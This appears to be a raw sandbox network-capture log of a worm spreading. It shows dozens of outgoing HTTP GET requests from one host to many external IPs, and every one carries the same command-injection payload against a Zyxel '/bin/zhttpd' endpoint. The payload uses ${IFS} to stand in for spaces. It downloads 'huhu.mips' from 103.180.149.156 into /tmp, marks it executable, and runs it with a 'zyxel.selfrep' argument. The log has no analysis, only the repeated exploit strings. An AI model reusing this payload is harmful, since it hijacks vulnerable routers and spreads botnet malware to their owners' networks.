                                                        Feb 2, 2024 06:20:55.627068043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        767192.168.2.1452556208.172.20.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627119064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        768192.168.2.1453082134.99.179.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627166033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        769192.168.2.1438944220.157.200.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627187014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        770192.168.2.1446592193.65.67.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627239943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        771192.168.2.14601024.69.191.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627269030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        772192.168.2.145936477.29.167.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627305031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        773192.168.2.1446562100.179.22.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627352953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        774192.168.2.1453226162.226.247.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627372980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        775192.168.2.1445548209.199.16.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627404928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        776192.168.2.1459316129.146.67.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627427101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        777192.168.2.1442954183.236.106.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627473116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        778192.168.2.145122261.61.160.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627502918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        779192.168.2.145770435.177.23.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627536058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        780192.168.2.1452734184.30.112.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627588034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        781192.168.2.1435238158.167.123.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627626896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        782192.168.2.1442810197.49.12.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627676964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        783192.168.2.144639639.22.147.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627712011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        784192.168.2.145871814.149.129.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627753973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        785192.168.2.1455320143.202.31.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627810955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        786192.168.2.1437726123.73.172.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627850056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        787192.168.2.1450442165.208.162.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627891064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        788192.168.2.144692627.65.12.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627923012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        789192.168.2.1446436136.18.88.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.627968073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        790192.168.2.144888427.155.142.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628007889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        791192.168.2.1446280223.221.78.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628045082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        792192.168.2.145996282.86.64.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628078938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        793192.168.2.1456554169.123.210.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628099918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        794192.168.2.144840665.131.51.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628156900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        795192.168.2.1436456135.38.144.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628191948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        796192.168.2.145889260.111.155.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628216028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        797192.168.2.1438280118.79.4.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628238916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        798192.168.2.1448484148.78.229.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628287077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        799192.168.2.143342043.213.37.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628317118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        800192.168.2.1456026171.22.87.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628349066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        801192.168.2.1454918158.84.249.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628403902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        802192.168.2.1460034202.250.248.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628432989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        803192.168.2.1460976147.67.60.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628484011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        804192.168.2.1445916220.253.20.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628515005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        805192.168.2.1450786196.136.150.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628540039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        806192.168.2.1439038117.250.87.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628582954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        807192.168.2.144346052.114.247.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628623009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        808192.168.2.1439700143.226.254.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628659010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        809192.168.2.1441748131.125.96.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628686905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        810192.168.2.1451044110.104.250.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628731012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        811192.168.2.1438668194.64.101.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628774881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        812192.168.2.146056458.147.66.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628793001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        813192.168.2.145675069.156.77.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628839970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        814192.168.2.1446412169.101.66.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628859043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        815192.168.2.1451272115.72.100.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628890038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        816192.168.2.1437372183.183.254.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628947973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        817192.168.2.145418867.54.205.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.628982067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        818192.168.2.144139636.199.84.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629018068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        819192.168.2.1458004219.192.139.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629055023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        820192.168.2.144409850.254.242.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629117012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        821192.168.2.145813085.9.218.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629134893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        822192.168.2.145531232.64.140.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629165888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        823192.168.2.145603853.57.166.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629211903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        824192.168.2.1432850196.102.219.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629261017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        825192.168.2.145740014.82.221.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629303932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        826192.168.2.1436290178.229.46.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629323959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        827192.168.2.143975269.84.249.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629360914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        828192.168.2.1433404132.36.204.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.629401922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        829192.168.2.145213025.159.152.122443
                                                        TimestampBytes transferredDirectionData
